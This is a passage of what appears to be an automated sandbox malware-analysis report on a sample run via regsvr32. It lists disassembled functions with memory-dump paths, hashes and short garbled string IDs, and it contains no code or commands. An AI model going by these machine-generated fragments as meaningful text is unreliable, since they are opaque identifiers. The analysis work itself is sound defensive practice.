                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: o6.$s8Q${Fl&
                                                                                                                                • API String ID: 0-2665016659
                                                                                                                                • Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                                                                                • Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
                                                                                                                                • Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                                                                                • Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180020768 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$T]0$ba^2
                                                                                                                                • API String ID: 0-1276948933
                                                                                                                                • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                                                                                • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001D49C Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6w5*$EDO$V
                                                                                                                                • API String ID: 0-1640223502
                                                                                                                                • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                                • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000A6EC Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Y()$i_"o$|Y
                                                                                                                                • API String ID: 0-942011364
                                                                                                                                • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                                • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180017378 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: O)$,G$-
                                                                                                                                • API String ID: 0-23008916
                                                                                                                                • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                                • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000A270 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ;U[$L$Q#
                                                                                                                                • API String ID: 0-2933747092
                                                                                                                                • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                                • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001DFB4 Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5($<:*$qwX
                                                                                                                                • API String ID: 0-3944236288
                                                                                                                                • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                                • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001C05C Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 79&$s`~$v;
                                                                                                                                • API String ID: 0-3844292866
                                                                                                                                • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                                • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000551C Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: wQ_$1_$ac
                                                                                                                                • API String ID: 0-1037425278
                                                                                                                                • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                                • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180023831 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )K$U|$|1-
                                                                                                                                • API String ID: 0-2543966960
                                                                                                                                • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                                                                                • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180029368 Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6|$6`d$H~z
                                                                                                                                • API String ID: 0-1702722476
                                                                                                                                • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                                • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019618 Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: d~$`5$t>
                                                                                                                                • API String ID: 0-1282322184
                                                                                                                                • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                                • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000BB28 Relevance: 3.8, Strings: 3, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #St$JYr$hmn
                                                                                                                                • API String ID: 0-1556749129
                                                                                                                                • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                                                                                • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180002610 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TGA$K$W}
                                                                                                                                • API String ID: 0-588348707
                                                                                                                                • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                                • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000738C Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: :1,$@H${C=
                                                                                                                                • API String ID: 0-2737386091
                                                                                                                                • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                                • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001481C Relevance: 3.8, Strings: 3, Instructions: 74COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: prP$q<C$uL
                                                                                                                                • API String ID: 0-1414207395
                                                                                                                                • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                                • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180006458 Relevance: 3.8, Strings: 3, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: :00D$Kl$(R'
                                                                                                                                • API String ID: 0-3661897330
                                                                                                                                • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                                • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C39C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2299586839-1052752507
                                                                                                                                • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                • Instruction ID: 964b9e8d1af1e52c854b3bb8fe8252e49b9a3c928b7092b29c793ac270e5c208
                                                                                                                                • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                • Instruction Fuzzy Hash: A4119172B0868385FB705A64E4913B933D0AB847A8F444031DA8E8B3F5DE2CE5468702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9E1E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2299586839-1052752507
                                                                                                                                • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                • Instruction ID: 3dbc7ef3cd3679c604427e4d63d90cad7a1c9e66348bca22563b4959c05d1934
                                                                                                                                • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                • Instruction Fuzzy Hash: 72E06521E0CA8281F630A710E8513AA77D0BF98768F804231D69D466F5DE2CE255CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800264F0 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$Y}
                                                                                                                                • API String ID: 0-941771097
                                                                                                                                • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                                • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180018148 Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7;}~$?C
                                                                                                                                • API String ID: 0-2633536567
                                                                                                                                • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                                • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180025DAC Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5"*$Wu
                                                                                                                                • API String ID: 0-3407213400
                                                                                                                                • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                                • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180026B10 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F/|$]M
                                                                                                                                • API String ID: 0-4182351379
                                                                                                                                • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                                • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180021C3C Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ;SH$nK
                                                                                                                                • API String ID: 0-1681473137
                                                                                                                                • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
